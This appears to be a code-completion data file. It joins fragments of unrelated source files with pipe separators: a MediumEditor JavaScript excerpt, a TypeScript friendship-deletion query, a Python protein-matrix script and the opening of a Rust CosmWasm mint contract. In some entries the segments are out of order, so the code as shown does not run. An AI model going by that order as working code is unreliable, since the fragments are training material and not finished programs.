// instead delete previous node and cancel the event.
node.previousElementSibling.parentNode.removeChild(node.previousElementSibling);
event.preventDefault();
} else if (event.which === Util.keyCode.ENTER) {
// hitting return in the begining of a header will create empty header elements before the current one
// instead, make "<p><br></p>" element, which are what happens if you hit return in an empty paragraph
p = this.options.ownerDocument.createElement('p');
p.innerHTML = '<br>';
node.previousElementSibling.parentNode.insertBefore(p, node);
event.preventDefault();
}
} else if (event.which === Util.keyCode.DELETE &&
// between two sibling elements
node.nextElementSibling &&
node.previousElementSibling &&
// not in a header
!isHeader.test(tagName) &&
// in an empty tag
isEmpty.test(node.innerHTML) &&
// when the next tag *is* a header
isHeader.test(node.nextElementSibling.tagName)) {
// hitting delete in an empty element preceding a header, ex:
// <p>[CURSOR]</p><h1>Header</h1>
// Will cause the h1 to become a paragraph.
// Instead, delete the paragraph node and move the cursor to the begining of the h1
// remove node and move cursor to start of header
range = this.options.ownerDocument.createRange();
sel = this.options.ownerDocument.getSelection();
range.setStart(node.nextElementSibling, 0);
range.collapse(true);
sel.removeAllRanges();
sel.addRange(range);
node.previousElementSibling.parentNode.removeChild(node);
event.preventDefault();
} else if (event.which === Util.keyCode.BACKSPACE &&
tagName === 'li' &&
// hitting backspace inside an empty li
isEmpty.test(node.innerHTML) &&
// is first element (no preceeding siblings)
!node.previousElementSibling &&
// parent also does not have a sibling
!node.parentElement.previousElementSibling &&
// is not the only li in a list
node.nextElementSibling.tagName.toLowerCase() === 'li') {
// backspacing in an empty first list element in the first list (with more elements) ex:
// <ul><li>[CURSOR]</li><li>List Item 2</li></ul>
// will remove the first <li> but add some extra element before (varies based on browser)
// Instead, this will:
// 1) remove the list element
// 2) create a paragraph before the list
// 3) move the cursor into the paragraph
// create a paragraph before the list
p = this.options.ownerDocument.createElement('p');
p.innerHTML = '<br>';
node.parentElement.parentElement.insertBefore(p, node.parentElement);
// move the cursor into the new paragraph
range = this.options.ownerDocument.createRange();
sel = this.options.ownerDocument.getSelection();
range.setStart(p, 0);
range.collapse(true);
sel.removeAllRanges();
sel.addRange(range);
// remove the list element
node.parentElement.removeChild(node);
event.preventDefault();
}
}
function handleDrag(event) {
var className = 'medium-editor-dragover';
event.preventDefault();
event.dataTransfer.dropEffect = 'copy';
if (event.type === 'dragover') {
event.target.classList.add(className);
} else if (event.type === 'dragleave') {
event.target.classList.remove(className);
}
}
function handleDrop(event) {
var className = 'medium-editor-dragover',
files;
event.preventDefault();
event.stopPropagation();
// IE9 does not support the File API, so prevent file from opening in a new window
// but also don't try to actually get the file
if (event.dataTransfer.files) {
files = Array.prototype.slice.call(event.dataTransfer.files, 0);
files.some(function (file) {
if (file.type.match('image')) {
var fileReader, id;
fileReader = new FileReader();
fileReader.readAsDataURL(file);
id = 'medium-img-' + (+new Date());
Util.insertHTMLCommand(this.options.ownerDocument, '<img class="medium-image-loading" id="' + id + '" />');
fileReader.onload = function () {
var img = this.options.ownerDocument.getElementById(id);
if (img) {
img.removeAttribute('id');
img.removeAttribute('class');
img.src = fileReader.result;
}
}.bind(this);
}
}.bind(this));
}
event.target.classList.remove(className);
}
function handleKeyup(event) {
var node = Util.getSelectionStart(this.options.ownerDocument),
tagName;
if (!node) {
return;
}
if (node.getAttribute('data-medium-element') && node.children.length === 0) {
this.options.ownerDocument.execCommand('formatBlock', false, 'p');
}
if (event.which === Util.keyCode.ENTER && !Util.isListItem(node)) {
tagName = node.tagName.toLowerCase();
// For anchor tags, unlink
if (tagName === 'a') {
this.options.ownerDocument.execCommand('unlink', false, null);
} else if (!event.shiftKey) {
// only format block if this is not a header tag
if (!/h\d/.test(tagName)) {
this.options.ownerDocument.execCommand('formatBlock', false, 'p');
}
}
}
}
// Internal helper methods which shouldn't be exposed externally
function createElementsArray(selector) {
if (!selector) {
selector = [];
}
// If string, use as query selector
if (typeof selector === 'string') {
selector = this.options.ownerDocument.querySelectorAll(selector);
}
// If element, put into array
if (Util.isElement(selector)) {
selector = [selector];
}
// Convert NodeList (or other array like object) into an array
var elements = Array.prototype.slice.apply(selector);
// Loop through elements and convert textarea's into divs
this.elements = [];
elements.forEach(function (element) {
if (element.tagName.toLowerCase() === 'textarea') {
this.elements.push(createContentEditable.call(this, element));
} else {
this.elements.push(element);
}
}, this);
}
function initExtension(extension, name, instance) {
if (extension.parent) {
extension.base = instance;
}
if (typeof extension.init === 'function') {
extension.init(instance);
}
if (!extension.name) {
extension.name = name;
}
return extension;
}
function shouldAddDefaultAnchorPreview() {
var i,
shouldAdd = false;
// If anchor-preview is disabled, don't add
if (this.options.disableAnchorPreview) {
return false;
}
// If anchor-preview extension has been overriden, don't add
if (this.options.extensions['anchor-preview']) {
return false;
}
// If toolbar is disabled, don't add
if (this.options.disableToolbar) {
return false;
}
// If all elements have 'data-disable-toolbar' attribute, don't add
for (i = 0; i < this.elements.length; i += 1) {
if (!this.elements[i].getAttribute('data-disable-toolbar')) {
shouldAdd = true;
break;
}
}
return shouldAdd;
}
function createContentEditable(textarea) {
var div = this.options.ownerDocument.createElement('div'),
id = (+new Date()),
attributesToClone = [
'data-disable-editing',
'data-disable-toolbar',
'data-placeholder',
'data-disable-return',
'data-disable-double-return',
'data-disable-preview',
'spellcheck'
];
div.className = textarea.className;
div.id = id;
div.innerHTML = textarea.value;
div.setAttribute('medium-editor-textarea-id', id);
attributesToClone.forEach(function (attr) {
if (textarea.hasAttribute(attr)) {
div.setAttribute(attr, textarea.getAttribute(attr));
}
});
textarea.classList.add('medium-editor-hidden');
textarea.setAttribute('medium-editor-textarea-id', id);
textarea.parentNode.insertBefore(
div,
textarea
);
return div;
}
function initElements() {
this.elements.forEach(function (element) {
if (!this.options.disableEditing && !element.getAttribute('data-disable-editing')) {
element.setAttribute('contentEditable', true);
element.setAttribute('spellcheck', this.options.spellcheck);
}
if (!element.getAttribute('data-placeholder')) {
element.setAttribute('data-placeholder', this.options.placeholder);
}
element.setAttribute('data-medium-element', true);
element.setAttribute('role', 'textbox');
element.setAttribute('aria-multiline', true);
if (element.hasAttribute('medium-editor-textarea-id')) {
this.on(element, 'input', function (event) {
var target = event.target,
textarea = target.parentNode.querySelector('textarea[medium-editor-textarea-id="' + target.getAttribute('medium-editor-textarea-id') + '"]');
if (textarea) {
textarea.value = this.serialize()[target.id].value;
}
}.bind(this));
}
}, this);
}
function initToolbar() {
if (this.toolbar || this.options.disableToolbar) {
return false;
}
var addToolbar = this.elements.some(function (element) {
return !element.getAttribute('data-disable-toolbar');
});
if (addToolbar) {
this.toolbar = new Toolbar(this);
this.options.elementsContainer.appendChild(this.toolbar.getToolbarElement());
}
}
function attachHandlers() {
var i;
// attach to tabs
this.subscribe('editableKeydownTab', handleTabKeydown.bind(this));
// Bind keys which can create or destroy a block element: backspace, delete, return
this.subscribe('editableKeydownDelete', handleBlockDeleteKeydowns.bind(this));
this.subscribe('editableKeydownEnter', handleBlockDeleteKeydowns.bind(this));
// disabling return or double return
if (this.options.disableReturn || this.options.disableDoubleReturn) {
this.subscribe('editableKeydownEnter', handleDisabledEnterKeydown.bind(this));
} else {
for (i = 0; i < this.elements.length; i += 1) {
if (this.elements[i].getAttribute('data-disable-return') || this.elements[i].getAttribute('data-disable-double-return')) {
this.subscribe('editableKeydownEnter', handleDisabledEnterKeydown.bind(this));
break;
}
}
}
// if we're not disabling return, add a handler to help handle cleanup
// for certain cases when enter is pressed
if (!this.options.disableReturn) {
this.elements.forEach(function (element) {
if (!element.getAttribute('data-disable-return')) {
this.on(element, 'keyup', handleKeyup.bind(this));
}
}, this);
}
// drag and drop of images
if (this.options.imageDragging) {
this.subscribe('editableDrag', handleDrag.bind(this));
this.subscribe('editableDrop', handleDrop.bind(this));
}
}
function initPasteHandler(options) {
// Backwards compatability
var defaultsBC = {
forcePlainText: this.options.forcePlainText, // deprecated
cleanPastedHTML: this.options.cleanPastedHTML, // deprecated
disableReturn: this.options.disableReturn,
targetBlank: this.options.targetBlank,
'window': this.options.contentWindow,
'document': this.options.ownerDocument
};
return new MediumEditor.extensions.paste(
Util.extend({}, options, defaultsBC)
);
}
function initCommands() {
var buttons = this.options.buttons,
extensions = this.options.extensions,
ext,
name;
this.commands = [];
buttons.forEach(function (buttonName) {
if (extensions[buttonName]) {
ext = initExtension(extensions[buttonName], buttonName, this);
this.commands.push(ext);
} else if (buttonName === 'anchor') {
ext = initExtension(new AnchorExtension(), buttonName, this);
this.commands.push(ext);
} else if (buttonName === 'fontsize') {
ext = initExtension(new FontSizeExtension(), buttonName, this);
this.commands.push(ext);
} else if (ButtonsData.hasOwnProperty(buttonName)) {
ext = new DefaultButton(ButtonsData[buttonName], this);
this.commands.push(ext);
}
}, this);
for (name in extensions) {
if (extensions.hasOwnProperty(name) && buttons.indexOf(name) === -1) {
ext = initExtension(extensions[name], name, this);
this.commands.push(ext);
}
}
// Only add default paste extension if it wasn't overriden
if (!this.options.extensions['paste']) {
this.commands.push(initExtension(initPasteHandler.call(this, this.options.paste), 'paste', this));
}
// Add AnchorPreview as extension if needed
if (shouldAddDefaultAnchorPreview.call(this)) {
this.commands.push(initExtension(new AnchorPreview(), 'anchor-preview', this));
}
}
function mergeOptions(defaults, options) {
// warn about using deprecated properties
if (options) {
[['forcePlainText', 'paste.forcePlainText'],
['cleanPastedHTML', 'paste.cleanPastedHTML']].forEach(function (pair) {
if (options.hasOwnProperty(pair[0]) && options[pair[0]] !== undefined) {
Util.deprecated(pair[0], pair[1], 'v5.0.0');
}
});
}
var nestedMerges = ['paste'],
tempOpts = Util.extend({}, options);
nestedMerges.forEach(function (toMerge) {
if (!tempOpts[toMerge]) {
tempOpts[toMerge] = defaults[toMerge];
} else {
tempOpts[toMerge] = Util.defaults({}, tempOpts[toMerge], defaults[toMerge]);
}
});
return Util.defaults(tempOpts, defaults);
}
function execActionInternal(action, opts) {
/*jslint regexp: true*/
var appendAction = /^append-(.+)$/gi,
match;
/*jslint regexp: false*/
// Actions starting with 'append-' should attempt to format a block of text ('formatBlock') using a specific
// type of block element (ie append-blockquote, append-h1, append-pre, etc.)
match = appendAction.exec(action);
if (match) {
return Util.execFormatBlock(this.options.ownerDocument, match[1]);
}
if (action === 'fontSize') {
return this.options.ownerDocument.execCommand('fontSize', false, opts.size);
}
if (action === 'createLink') {
return this.createLink(opts);
}
if (action === 'image') {
return this.options.ownerDocument.execCommand('insertImage', false, this.options.contentWindow.getSelection());
}
return this.options.ownerDocument.execCommand(action, false, null);
}
// deprecate
MediumEditor.statics = {
ButtonsData: ButtonsData,
DefaultButton: DefaultButton,
AnchorExtension: AnchorExtension,
FontSizeExtension: FontSizeExtension,
Toolbar: Toolbar,
AnchorPreview: AnchorPreview
};
MediumEditor.Extension = Extension;
MediumEditor.extensions = extensionDefaults;
MediumEditor.util = Util;
MediumEditor.selection = Selection;
MediumEditor.prototype = {
defaults: editorDefaults,
// NOT DOCUMENTED - exposed for backwards compatability
init: function (elements, options) {
var uniqueId = 1;
this.options = mergeOptions.call(this, this.defaults, options);
createElementsArray.call(this, elements);
if (this.elements.length === 0) {
return;
}
if (!this.options.elementsContainer) {
this.options.elementsContainer = this.options.ownerDocument.body;
}
while (this.options.elementsContainer.querySelector('#medium-editor-toolbar-' + uniqueId)) {
uniqueId = uniqueId + 1;
}
this.id = uniqueId;
return this.setup();
},
setup: function () {
if (this.isActive) {
return;
}
this.events = new Events(this);
this.isActive = true;
// Call initialization helpers
initElements.call(this);
initCommands.call(this);
initToolbar.call(this);
attachHandlers.call(this);
if (!this.options.disablePlaceholders) {
this.placeholders = new Placeholders(this);
}
},
destroy: function () {
if (!this.isActive) {
return;
}
var i;
this.isActive = false;
if (this.toolbar !== undefined) {
this.toolbar.deactivate();
delete this.toolbar;
}
for (i = 0; i < this.elements.length; i += 1) {
this.elements[i].removeAttribute('contentEditable');
this.elements[i].removeAttribute('spellcheck');
this.elements[i].removeAttribute('data-medium-element');
}
this.commands.forEach(function (extension) {
if (typeof extension.deactivate === 'function') {
extension.deactivate();
}
}, this);
this.events.detachAllDOMEvents();
this.events.detachAllCustomEvents();
},
on: function (target, event, listener, useCapture) {
this.events.attachDOMEvent(target, event, listener, useCapture);
},
off: function (target, event, listener, useCapture) {
this.events.detachDOMEvent(target, event, listener, useCapture);
},
subscribe: function (event, listener) {
this.events.attachCustomEvent(event, listener);
},
unsubscribe: function (event, listener) {
this.events.detachCustomEvent(event, listener);
},
delay: function (fn) {
var self = this;
return setTimeout(function () {
if (self.isActive) {
fn();
}
}, this.options.delay);
},
serialize: function () {
var i,
elementid,
content = {};
for (i = 0; i < this.elements.length; i += 1) {
elementid = (this.elements[i].id !== '') ? this.elements[i].id : 'element-' + i;
content[elementid] = {
value: this.elements[i].innerHTML.trim()
};
}
return content;
},
getExtensionByName: function (name) {
var extension;
if (this.commands && this.commands.length) {
this.commands.some(function (ext) {
if (ext.name === name) {
extension = ext;
return true;
}
return false;
});
}
return extension;
},
/**
* NOT DOCUMENTED - exposed for backwards compatability
* Helper function to call a method with a number of parameters on all registered extensions.
* The function assures that the function exists before calling.
*
* @param {string} funcName name of the function to call
* @param [args] arguments passed into funcName
*/
callExtensions: function (funcName) {
if (arguments.length < 1) {
return;
}
var args = Array.prototype.slice.call(arguments, 1),
ext,
name;
for (name in this.options.extensions) {
if (this.options.extensions.hasOwnProperty(name)) {
ext = this.options.extensions[name];
if (ext[funcName] !== undefined) {
ext[funcName].apply(ext, args);
}
}
}
return this;
},
stopSelectionUpdates: function () {
this.preventSelectionUpdates = true;
},
startSelectionUpdates: function () {
this.preventSelectionUpdates = false;
},
// NOT DOCUMENTED - exposed as extension helper and for backwards compatability
checkSelection: function () {
if (this.toolbar) {
this.toolbar.checkState();
}
return this;
},
// Wrapper around document.queryCommandState for checking whether an action has already
// been applied to the current selection
queryCommandState: function (action) {
var fullAction = /^full-(.+)$/gi,
match,
queryState = null;
// Actions starting with 'full-' need to be modified since this is a medium-editor concept
match = fullAction.exec(action);
if (match) {
action = match[1];
}
try {
queryState = this.options.ownerDocument.queryCommandState(action);
} catch (exc) {
queryState = null;
}
return queryState;
},
execAction: function (action, opts) {
/*jslint regexp: true*/
var fullAction = /^full-(.+)$/gi,
match,
result;
/*jslint regexp: false*/
// Actions starting with 'full-' should be applied to to the entire contents of the editable element
// (ie full-bold, full-append-pre, etc.)
match = fullAction.exec(action);
if (match) {
// Store the current selection to be restored after applying the action
this.saveSelection();
// Select all of the contents before calling the action
this.selectAllContents();
result = execActionInternal.call(this, match[1], opts);
// Restore the previous selection
this.restoreSelection();
} else {
result = execActionInternal.call(this, action, opts);
}
// do some DOM clean-up for known browser issues after the action
if (action === 'insertunorderedlist' || action === 'insertorderedlist') {
Util.cleanListDOM(this.getSelectedParentElement());
}
this.checkSelection();
return result;
},
getSelectedParentElement: function (range) {
if (range === undefined) {
range = this.options.contentWindow.getSelection().getRangeAt(0);
}
return Selection.getSelectedParentElement(range);
},
// NOT DOCUMENTED - exposed as extension helper
hideToolbarDefaultActions: function () {
if (this.toolbar) {
this.toolbar.hideToolbarDefaultActions();
}
return this;
},
// NOT DOCUMENTED - exposed as extension helper and for backwards compatability
setToolbarPosition: function () {
if (this.toolbar) {
this.toolbar.setToolbarPosition();
}
},
selectAllContents: function () {
var currNode = Selection.getSelectionElement(this.options.contentWindow);
if (currNode) {
// Move to the lowest descendant node that still selects all of the contents
while (currNode.children.length === 1) {
currNode = currNode.children[0];
}
this.selectElement(currNode);
}
},
selectElement: function (element) {
Selection.selectNode(element, this.options.ownerDocument);
var selElement = Selection.getSelectionElement(this.options.contentWindow);
if (selElement) {
this.events.focusElement(selElement);
}
},
// http://stackoverflow.com/questions/17678843/cant-restore-selection-after-html-modify-even-if-its-the-same-html
// Tim Down
// TODO: move to selection.js and clean up old methods there
exportSelection: function () {
var selectionState = null,
selection = this.options.contentWindow.getSelection(),
range,
preSelectionRange,
start,
editableElementIndex = -1;
if (selection.rangeCount > 0) {
range = selection.getRangeAt(0);
preSelectionRange = range.cloneRange();
// Find element current selection is inside
this.elements.some(function (el, index) {
if (el === range.startContainer || Util.isDescendant(el, range.startContainer)) {
editableElementIndex = index;
return true;
}
return false;
});
if (editableElementIndex > -1) {
preSelectionRange.selectNodeContents(this.elements[editableElementIndex]);
preSelectionRange.setEnd(range.startContainer, range.startOffset);
start = preSelectionRange.toString().length;
selectionState = {
start: start,
end: start + range.toString().length,
editableElementIndex: editableElementIndex
};
}
}
if (selectionState !== null && selectionState.editableElementIndex === 0) {
delete selectionState.editableElementIndex;
}
return selectionState;
},
saveSelection: function () {
this.selectionState = this.exportSelection();
},
// http://stackoverflow.com/questions/17678843/cant-restore-selection-after-html-modify-even-if-its-the-same-html
// Tim Down
// TODO: move to selection.js and clean up old methods there
importSelection: function (inSelectionState) {
if (!inSelectionState) {
return;
}
var editableElementIndex = inSelectionState.editableElementIndex === undefined ?
0 : inSelectionState.editableElementIndex,
selectionState = {
editableElementIndex: editableElementIndex,
start: inSelectionState.start,
end: inSelectionState.end
},
editableElement = this.elements[selectionState.editableElementIndex],
charIndex = 0,
range = this.options.ownerDocument.createRange(),
nodeStack = [editableElement],
node,
foundStart = false,
stop = false,
i,
sel,
nextCharIndex;
range.setStart(editableElement, 0);
range.collapse(true);
node = nodeStack.pop();
while (!stop && node) {
if (node.nodeType === 3) {
nextCharIndex = charIndex + node.length;
if (!foundStart && selectionState.start >= charIndex && selectionState.start <= nextCharIndex) {
range.setStart(node, selectionState.start - charIndex);
foundStart = true;
}
if (foundStart && selectionState.end >= charIndex && selectionState.end <= nextCharIndex) {
range.setEnd(node, selectionState.end - charIndex);
stop = true;
}
charIndex = nextCharIndex;
} else {
i = node.childNodes.length - 1;
while (i >= 0) {
nodeStack.push(node.childNodes[i]);
i -= 1;
}
}
if (!stop) {
node = nodeStack.pop();
}
}
sel = this.options.contentWindow.getSelection();
sel.removeAllRanges();
sel.addRange(range);
},
restoreSelection: function () {
this.importSelection(this.selectionState);
},
createLink: function (opts) {
var customEvent,
i;
if (opts.url && opts.url.trim().length > 0) {
this.options.ownerDocument.execCommand('createLink', false, opts.url);
if (this.options.targetBlank || opts.target === '_blank') {
Util.setTargetBlank(Util.getSelectionStart(this.options.ownerDocument));
}
if (opts.buttonClass) {
Util.addClassToAnchors(Util.getSelectionStart(this.options.ownerDocument), opts.buttonClass);
}
}
if (this.options.targetBlank || opts.target === '_blank' || opts.buttonClass) {
customEvent = this.options.ownerDocument.createEvent('HTMLEvents');
customEvent.initEvent('input', true, true, this.options.contentWindow);
for (i = 0; i < this.elements.length; i += 1) {
this.elements[i].dispatchEvent(customEvent);
}
}
},
// alias for setup - keeping for backwards compatability
activate: function () {
Util.deprecatedMethod.call(this, 'activate', 'setup', arguments, 'v5.0.0');
},
// alias for destroy - keeping for backwards compatability
deactivate: function () {
Util.deprecatedMethod.call(this, 'deactivate', 'destroy', arguments, 'v5.0.0');
},
cleanPaste: function (text) {
this.getExtensionByName('paste').cleanPaste(text);
},
pasteHTML: function (html, options) {
this.getExtensionByName('paste').pasteHTML(html, options);
}
};
}());
MediumEditor.version = (function (major, minor, revision) {
return {
major: parseInt(major, 10),
minor: parseInt(minor, 10),
revision: parseInt(revision, 10),
toString: function () {
return [major, minor, revision].join('.');
}
};
}).apply(this, ({
// grunt-bump looks for this:
'version': '4.7.0'
}).version.split('.'));
return MediumEditor;
}())); |
(function () {
'use strict'; |
_deleteFriendshipByFrienshipUuid.ts | export const _deleteFriendshipByFrienshipUuid = async( friendshipUuid: string, sql: any) => {
await sql`
DELETE from "Friendships" | `
return "OK"
} | WHERE "friendshipUuid" = ${friendshipUuid} |
make_bb_info_mats.py | from numpy.core.numeric import full
from numpy.lib.function_base import append
import prody as pr
import os
import numpy
import matplotlib as mpl
import pylab
from itertools import combinations, combinations_with_replacement
from docopt import docopt
import itertools
import pickle
import sys
from scipy.linalg.basic import matrix_balance
from scipy.spatial.distance import cdist
from . import ligand_database as ld
from . import features_pdb2dihe as fpdh
metal_sel = 'ion or name NI MN ZN CO CU MG FE'
#TO DO: create artificial aa in the 4th aa.
def get_atg(full_pdb):
'''
prody atomgroup will be used to calc bb info.
If the contact aa is at terminal, then the shape of the dist matrix will be < 12. So contact aa will be copied and added.
'''
metal = full_pdb.select(metal_sel)[0]
contact_aas = full_pdb.select('protein and not carbon and not hydrogen and within 2.83 of resindex ' + str(metal.getResindex()))
contact_aa_resinds = numpy.unique(contact_aas.getResindices())
extention = 1
coords = []
resnames = []
names = []
resnums = []
resn = 1
for resind in contact_aa_resinds:
ext_inds = ld.extend_res_indices([resind], full_pdb, extend =extention)
#In some cases, the contact aa is at terminal. We can add more aa to match the shape.
if len(ext_inds) == 2:
if ext_inds[0] == resind:
ext_inds.insert(0, resind)
else:
ext_inds.append(resind)
if len(ext_inds) == 1:
ext_inds.append(resind)
ext_inds.append(resind)
for ind in ext_inds:
aa = full_pdb.select('resindex ' + str(ind))
coords.extend(aa.getCoords())
resnames.extend(aa.getResnames())
names.extend(aa.getNames())
resnums.extend([resn for _i in range(len(aa))])
resn += 1
if len(contact_aa_resinds) == 3:
coords.extend([])
resnames.extend([])
names.extend([])
resnums.extend([])
#ag = pr.AtomGroup('-'.join([str(p) for p in per]))
ag = pr.AtomGroup('0-1-2-3')
ag.setCoords(coords)
ag.setResnums(resnums)
ag.setResnames(resnames)
ag.setNames(names)
return ag
def get_atgs(full_pdb, contain_metal = True):
'''
prody atomgroup will be used to calc bb info.
If the contact aa is at terminal, then the shape of the dist matrix will be < 12. So contact aa will be copied and added.
'''
if contain_metal:
metal = full_pdb.select(metal_sel)[0]
contact_aas = full_pdb.select('protein and not carbon and not hydrogen and within 2.83 of resindex ' + str(metal.getResindex()))
else:
#TO DO: it is not quite right here if the pdb happened to have more HIS-CYS-GLU-ASP. Skip now.
contact_aas = full_pdb.select('resname HIS CYS GLU ASP')
if not contact_aas and len(numpy.unique(contact_aas.getResindices())) > 4:
return []
contact_aa_resinds = numpy.unique(contact_aas.getResindices())
extention = 1
# TO DO: If the len of contact_ass is not 4...
ags = []
#for per in itertools.permutations(range(len(contact_aa_resinds))):
for per in [range(len(contact_aa_resinds))]:
print(per)
coords = []
resnames = []
names = []
resnums = []
resn = 1
for idx in per:
resind = contact_aa_resinds[idx]
ext_inds = ld.extend_res_indices([resind], full_pdb, extend =extention)
#In some cases, the contact aa is at terminal. We can add more aa to match the shape.
if len(ext_inds) == 2:
if ext_inds[0] == resind:
ext_inds.insert(0, resind)
else:
ext_inds.append(resind)
if len(ext_inds) == 1:
ext_inds.append(resind)
ext_inds.append(resind)
for ind in ext_inds:
aa = full_pdb.select('resindex ' + str(ind))
coords.extend(aa.getCoords())
resnames.extend(aa.getResnames())
names.extend(aa.getNames())
resnums.extend([resn for _i in range(len(aa))])
resn += 1
ag = pr.AtomGroup('-'.join([str(p) for p in per]))
ag.setCoords(coords)
ag.setResnums(resnums)
ag.setResnames(resnames)
ag.setNames(names)
ags.append(ag)
return ags
def get_bb_dist_seq(core):
'''
If we know N CA C, The coords of CB could be calcualted. So we may not need CB coords.
'''
n_coords = core.select('name N').getCoords()
c_coords = core.select('name C').getCoords()
ca_coords = core.select('name CA').getCoords()
n_n = cdist(n_coords, n_coords)
c_c = cdist(c_coords, c_coords)
ca_ca = cdist(ca_coords, ca_coords)
cb_coords = []
for i in range(len(n_coords)):
Ca = ca_coords[i]
C = c_coords[i]
N = n_coords[i]
b = Ca - N
c = C - Ca
a = numpy.cross(b, c)
Cb = -0.58273431*a + 0.56802827*b - 0.54067466*c + Ca
cb_coords.append(Cb)
cb_coords = core.select('name CB').getCoords()
cb_cb = cdist(cb_coords, cb_coords)
return n_n, c_c, ca_ca, cb_cb
def get_dihe(ag):
'''
Please check features_pdb2dihe.py.
Only the contact aa will be extracted.
'''
nres = len(ag.select('name CA'))
print(nres)
dist, _omega, _theta_asym, _phi_asym = fpdh.get_neighbors(ag, nres, 20.0)
#TO DO: extract info, only the contact aa matters?!
omega = numpy.zeros((nres, nres))
theta_asym = numpy.zeros((nres, nres))
phi_asym = numpy.zeros((nres, nres))
for i in range(1, nres, 3):
for j in range(1, nres, 3):
omega[i, j] = _omega[i, j]
theta_asym[i, j] = _theta_asym[i, j]
phi_asym[i, j] = _phi_asym[i, j]
return omega, theta_asym, phi_asym
def get_seq_mat(ag, matrix_size = 12):
seq = ag.select('name CA').getResnames()
threelettercodes = ['ALA', 'ARG', 'ASN', 'ASP', 'CYS', 'GLU', 'GLN', 'GLY', 'HIS', 'ILE', 'LEU', 'LYS', 'MET',\
'PHE', 'PRO', 'SER', 'THR', 'TRP', 'TYR', 'VAL']
seq_channels = numpy.zeros([40, matrix_size, matrix_size], dtype=int)
for i in range(len(seq)):
aa = seq[i]
try:
idx = threelettercodes.index(aa)
except:
print('Resname of following atom not found: {}'.format(aa))
continue
for j in range(len(seq)):
seq_channels[idx][i][j] = 1 # horizontal rows of 1's in first 20 channels
seq_channels[idx+20][j][i] = 1 # vertical columns of 1's in next 20 channels
return seq_channels
def mk_full_mats(ag, matrix_size = 12):
nres = len(ag.select('name CA'))
n_n, c_c, ca_ca, cb_cb = get_bb_dist_seq(ag)
omega, theta_asym, phi_asym = get_dihe(ag)
seq_mats = get_seq_mat(ag, matrix_size)
full_mat = numpy.zeros((47, matrix_size, matrix_size))
# Make sure the shape of each matrix is smaller than the matrix_size.
full_mat[0,0:n_n.shape[0], 0:n_n.shape[1]] = n_n
full_mat[1,0:c_c.shape[0], 0:c_c.shape[1]] = c_c
full_mat[2,0:ca_ca.shape[0], 0:ca_ca.shape[1]] = ca_ca
full_mat[3,0:cb_cb.shape[0], 0:cb_cb.shape[1]] = cb_cb
full_mat[4,0:omega.shape[0], 0:omega.shape[1]] = omega
full_mat[5,0:theta_asym.shape[0], 0:theta_asym.shape[1]] = theta_asym
full_mat[6,0:phi_asym.shape[0], 0:phi_asym.shape[1]] = phi_asym
for i in range(7, 47):
full_mat[i, :, :] = seq_mats[i - 7]
return full_mat
def write_pickle_file(full_mat, pdb, ag, out_folder, tag = ''):
|
def write_dist_mat_file(mat, pdb, ag, out_folder, tag = ''):
"""
Writes out a file containing the distance matrix
"""
# output_folder = 'core_contact_maps/dist_mat_txt_folder/'
numpy.set_printoptions(threshold=numpy.inf)
dist_mat_file = pdb.split('.')[0]
dist_mat_file = out_folder + dist_mat_file + '_full_mat_' + ag.getTitle() + tag + '.txt'
with open(dist_mat_file, 'w') as open_file:
for i in mat:
open_file.write(str(i) + '\n')
return
def run_mk_bb_info_mats(workdir, out_path, mat_size = 12, top = 1000, contain_metal = True, opts = None):
os.makedirs(out_path, exist_ok=True)
count = 0
errors = ''
for pdb_name in os.listdir(workdir):
if count >= top:
break
if '.pdb' not in pdb_name:
continue
pdb_file = workdir + pdb_name
pdb = pr.parsePDB(pdb_file)
ags = get_atgs(pdb, contain_metal)
for ag in ags:
try:
#TO DO: currently, only consider 3 or 4 aa binding.
if len(ag.select('name CA'))> 12 or len(ag.select('name CA')) < 7:
print(pdb_name + ' not used. ')
continue
full_mat = mk_full_mats(ag, mat_size)
write_dist_mat_file(full_mat, pdb_name, ag, out_path)
write_pickle_file(full_mat, pdb_name, ag, out_path)
count += 1
except:
print('error: ' + pdb_name)
errors += pdb_name + '\n'
if count >= top:
break
with open(out_path + '_error.txt', 'w') as f:
f.write(errors)
return
| """
Writes a pickle file containing the input numpy array into the current permutation's folder.
Currently using this only to save the full matrix (all 46 channels).
"""
numpy.set_printoptions(threshold=numpy.inf)
pdb_name = pdb.split('.')[0]
pkl_file = out_folder + pdb_name + '_full_mat_' + ag.getTitle() + tag + '.pkl'
with open(pkl_file, 'wb') as f:
print(pkl_file)
pickle.dump(full_mat, f)
return |
contract.rs | use crate::{
asserts::{assert_auction_discount, assert_min_collateral_ratio, assert_protocol_fee},
positions::{
auction, burn, deposit, mint, open_position, query_next_position_idx, query_position,
query_positions, withdraw,
},
querier::load_oracle_feeder,
state::{
read_asset_config, read_config, store_asset_config, store_config, store_position_idx,
AssetConfig, Config,
},
};
#[cfg(not(feature = "library"))]
use cosmwasm_std::entry_point;
use cosmwasm_std::{
attr, from_binary, to_binary, Addr, Binary, CanonicalAddr, CosmosMsg, Decimal, Deps, DepsMut,
Env, MessageInfo, Response, StdError, StdResult, Uint128, WasmMsg,
};
use cw20::Cw20ReceiveMsg;
use mirror_protocol::collateral_oracle::{ExecuteMsg as CollateralOracleExecuteMsg, SourceType};
use mirror_protocol::mint::{
AssetConfigResponse, ConfigResponse, Cw20HookMsg, ExecuteMsg, IPOParams, InstantiateMsg,
MigrateMsg, QueryMsg,
};
use daodiseoswap::asset::{Asset, AssetInfo};
#[cfg_attr(not(feature = "library"), entry_point)]
pub fn instantiate(
deps: DepsMut,
_env: Env,
_info: MessageInfo,
msg: InstantiateMsg,
) -> StdResult<Response> {
let config = Config {
owner: deps.api.addr_canonicalize(&msg.owner)?,
oracle: deps.api.addr_canonicalize(&msg.oracle)?,
collector: deps.api.addr_canonicalize(&msg.collector)?,
collateral_oracle: deps.api.addr_canonicalize(&msg.collateral_oracle)?,
staking: deps.api.addr_canonicalize(&msg.staking)?,
daodiseoswap_factory: deps.api.addr_canonicalize(&msg.daodiseoswap_factory)?,
lock: deps.api.addr_canonicalize(&msg.lock)?,
base_denom: msg.base_denom,
token_code_id: msg.token_code_id,
protocol_fee_rate: assert_protocol_fee(msg.protocol_fee_rate)?,
};
store_config(deps.storage, &config)?;
store_position_idx(deps.storage, Uint128::from(1u128))?;
Ok(Response::default())
}
#[cfg_attr(not(feature = "library"), entry_point)]
pub fn execute(deps: DepsMut, env: Env, info: MessageInfo, msg: ExecuteMsg) -> StdResult<Response> {
match msg {
ExecuteMsg::Receive(msg) => receive_cw20(deps, env, info, msg),
ExecuteMsg::UpdateConfig {
owner,
oracle,
